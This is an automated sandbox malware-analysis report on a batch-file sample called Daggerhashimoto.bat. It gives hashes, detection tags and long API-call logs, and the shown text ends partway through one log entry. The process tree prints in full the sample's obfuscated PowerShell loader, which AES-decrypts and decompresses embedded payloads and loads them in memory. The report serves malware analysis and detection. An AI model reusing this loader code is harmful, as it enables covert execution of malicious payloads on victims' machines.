popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Daggerhashimoto.bat

NPKI Generic Malware Downloader Antivirus HTTP ScreenShot Create Service KeyLogger Internet API P2P DGA Http API Anti_VM FTP Socket Escalate priviledges DNS Code injection Sniff Audio Steal credential AntiDebug AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 April 10, 2023, 9:42 a.m. April 10, 2023, 9:44 a.m.
Size 1.9MB
Type ASCII text, with very long lines, with no line terminators
MD5 1a378a4fa84181614b51d0a0de0ebcbc
SHA256 46b59b52430a375b31cd7fa0fc416d994279bd86ba1da8e58222be83a38b2f4b
CRC32 A0CBA8C7
ssdeep 24576:3JqGkcZdFmcyFxVUjQn+aE9BoFMyvqRS1lX+V1HEyESk/PHxCsOWVnFvFF64yEbK:Hd8Fz+94Igfnb5yPZccAw
Yara
  • NPKI_Zero - File included NPKI
  • anti_vm_detect - Possibly employs anti-virtualization techniques
  • Antivirus - Contains references to security software

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "cNUT" C:\Users\test22\AppData\Local\Temp\Daggerhashimoto.bat

    3000

    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Daggerhashimoto.bat

      612

      • Daggerhashimoto.bat.exe "C:\Users\test22\AppData\Local\Temp\Daggerhashimoto.bat.exe" $MBjw='SMCKsplMCKsiMCKstMCKs'.Replace('MCKs', '');$Zazk='CrMCKseaMCKsteMCKsDecMCKsryMCKspMCKstorMCKs'.Replace('MCKs', '');$pgyS='TMCKsraMCKsnMCKssfoMCKsrmMCKsFMCKsinMCKsalBMCKslocMCKskMCKs'.Replace('MCKs', '');$rnTg='LoaMCKsdMCKs'.Replace('MCKs', '');$yITi='MaMCKsinMCKsMoMCKsdMCKsuMCKsleMCKs'.Replace('MCKs', '');$byHR='InMCKsvMCKsokMCKseMCKs'.Replace('MCKs', '');$JJhF='ReaMCKsdMCKsLiMCKsneMCKssMCKs'.Replace('MCKs', '');$ddgl='FrMCKsomBMCKsasMCKse6MCKs4SMCKstMCKsrMCKsiMCKsnMCKsgMCKs'.Replace('MCKs', '');$Nzus='ChMCKsaMCKsnMCKsgMCKseExMCKstensMCKsioMCKsnMCKs'.Replace('MCKs', '');$qiSi='EnMCKstrMCKsyPMCKsoMCKsintMCKs'.Replace('MCKs', '');$KqEJ='GeMCKstCMCKsuMCKsrrenMCKstMCKsPrMCKsoMCKscessMCKs'.Replace('MCKs', '');$YUqa='FMCKsiMCKsrsMCKstMCKs'.Replace('MCKs', '');function VXISz($xJrBE){$UoLXN=[System.Security.Cryptography.Aes]::Create();$UoLXN.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UoLXN.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UoLXN.Key=[System.Convert]::$ddgl('fSbE/ELtQVO/Dxms7Zp6CXdDpMkm3eOggmV7ILPMdik=');$UoLXN.IV=[System.Convert]::$ddgl('m1sJUnjHj7LNCIVQjqF9xQ==');$HMveB=$UoLXN.$Zazk();$LvnIY=$HMveB.$pgyS($xJrBE,0,$xJrBE.Length);$HMveB.Dispose();$UoLXN.Dispose();$LvnIY;}function dZeca($xJrBE){$pwdAe=New-Object System.IO.MemoryStream(,$xJrBE);$kHODJ=New-Object System.IO.MemoryStream;$xUoxC=New-Object System.IO.Compression.GZipStream($pwdAe,[IO.Compression.CompressionMode]::Decompress);$xUoxC.CopyTo($kHODJ);$xUoxC.Dispose();$pwdAe.Dispose();$kHODJ.Dispose();$kHODJ.ToArray();}$DnbCX=[System.Linq.Enumerable]::$YUqa([System.IO.File]::$JJhF([System.IO.Path]::$Nzus([System.Diagnostics.Process]::$KqEJ().$yITi.FileName, $null)));$VdgtA=$DnbCX.Substring(3).$MBjw(':');$tdiJC=dZeca (VXISz ([Convert]::$ddgl($VdgtA[0])));$fSFdV=dZeca (VXISz ([Convert]::$ddgl($VdgtA[1])));[System.Reflection.Assembly]::$rnTg([byte[]]$fSFdV).$qiSi.$byHR($null,$null);[System.Reflection.Assembly]::$rnTg([byte[]]$tdiJC).$qiSi.$byHR($null,$null);

        2376

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Unexpected token '(' in expression or statement.
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: At line:1 char:1006
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: + $MBjw='SMCKsplMCKsiMCKstMCKs'.Replace('MCKs', '');$Zazk='CrMCKseaMCKsteMCKsDe
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: cMCKsryMCKspMCKstorMCKs'.Replace('MCKs', '');$pgyS='TMCKsraMCKsnMCKssfoMCKsrmMC
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: KsFMCKsinMCKsalBMCKslocMCKskMCKs'.Replace('MCKs', '');$rnTg='LoaMCKsdMCKs'.Repl
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: ace('MCKs', '');$yITi='MaMCKsinMCKsMoMCKsdMCKsuMCKsleMCKs'.Replace('MCKs', '');
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: $byHR='InMCKsvMCKsokMCKseMCKs'.Replace('MCKs', '');$JJhF='ReaMCKsdMCKsLiMCKsneM
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: CKssMCKs'.Replace('MCKs', '');$ddgl='FrMCKsomBMCKsasMCKse6MCKs4SMCKstMCKsrMCKsi
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: MCKsnMCKsgMCKs'.Replace('MCKs', '');$Nzus='ChMCKsaMCKsnMCKsgMCKseExMCKstensMCKs
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: ioMCKsnMCKs'.Replace('MCKs', '');$qiSi='EnMCKstrMCKsyPMCKsoMCKsintMCKs'.Replace
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: ('MCKs', '');$KqEJ='GeMCKstCMCKsuMCKsrrenMCKstMCKsPrMCKsoMCKscessMCKs'.Replace(
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: 'MCKs', '');$YUqa='FMCKsiMCKsrsMCKstMCKs'.Replace('MCKs', '');function VXISz($x
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: JrBE){$UoLXN=[System.Security.Cryptography.Aes]::Create();$UoLXN.Mode=[System.S
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: ecurity.Cryptography.CipherMode]::CBC;$UoLXN.Padding=[System.Security.Cryptogra
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: phy.PaddingMode]::PKCS7;$UoLXN.Key=[System.Convert]::$ddgl( <<<< 'fSbE/ELtQVO/D
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: xms7Zp6CXdDpMkm3eOggmV7ILPMdik=');$UoLXN.IV=[System.Convert]::$ddgl('m1sJUnjHj7
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: LNCIVQjqF9xQ==');$HMveB=$UoLXN.$Zazk();$LvnIY=$HMveB.$pgyS($xJrBE,0,$xJrBE.Leng
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: th);$HMveB.Dispose();$UoLXN.Dispose();$LvnIY;}function dZeca($xJrBE){$pwdAe=New
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: -Object System.IO.MemoryStream(,$xJrBE);$kHODJ=New-Object System.IO.MemoryStrea
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: m;$xUoxC=New-Object System.IO.Compression.GZipStream($pwdAe,[IO.Compression.Com
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: pressionMode]::Decompress);$xUoxC.CopyTo($kHODJ);$xUoxC.Dispose();$pwdAe.Dispos
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: e();$kHODJ.Dispose();$kHODJ.ToArray();}$DnbCX=[System.Linq.Enumerable]::$YUqa([
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: System.IO.File]::$JJhF([System.IO.Path]::$Nzus([System.Diagnostics.Process]::$K
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: qEJ().$yITi.FileName, $null)));$VdgtA=$DnbCX.Substring(3).$MBjw(':');$tdiJC=dZe
console_handle: 0x00000137
1 1 0

WriteConsoleW

 buffer: ca (VXISz ([Convert]::$ddgl($VdgtA[0])));$fSFdV=dZeca (VXISz ([Convert]::$ddgl(
console_handle: 0x00000143
1 1 0

WriteConsoleW

 buffer: $VdgtA[1])));[System.Reflection.Assembly]::$rnTg([byte[]]$fSFdV).$qiSi.$byHR($n
console_handle: 0x0000014f
1 1 0

WriteConsoleW

 buffer: ull,$null);[System.Reflection.Assembly]::$rnTg([byte[]]$tdiJC).$qiSi.$byHR($nul
console_handle: 0x0000015b
1 1 0

WriteConsoleW

 buffer: l,$null);
console_handle: 0x00000167
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ParserError: ((:String) [], ParentContainsErrorR
console_handle: 0x00000173
1 1 0

WriteConsoleW

 buffer: ecordException
console_handle: 0x0000017f
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : UnexpectedToken
console_handle: 0x0000018b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052d258
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052da18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052da18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052da18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052d918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052d918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052d918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052d918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052d918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052d918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052d318
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052d318
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052d318
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052d4d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052d4d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052d4d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052d518
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052d4d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052d4d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052d4d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052d4d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052d4d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052d4d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052d4d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052ced8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052ced8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0056e5a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0056eb28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0056eb28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0056eb28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0056dde8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0056dde8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0056dde8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0056dde8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0056dde8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0056dde8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 1900544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02890000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2276
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73961000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2276
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73962000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02672000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02682000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02683000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02684000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02685000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02686000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a81000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a82000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a83000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a84000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a85000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a86000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a87000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a88000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a89000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
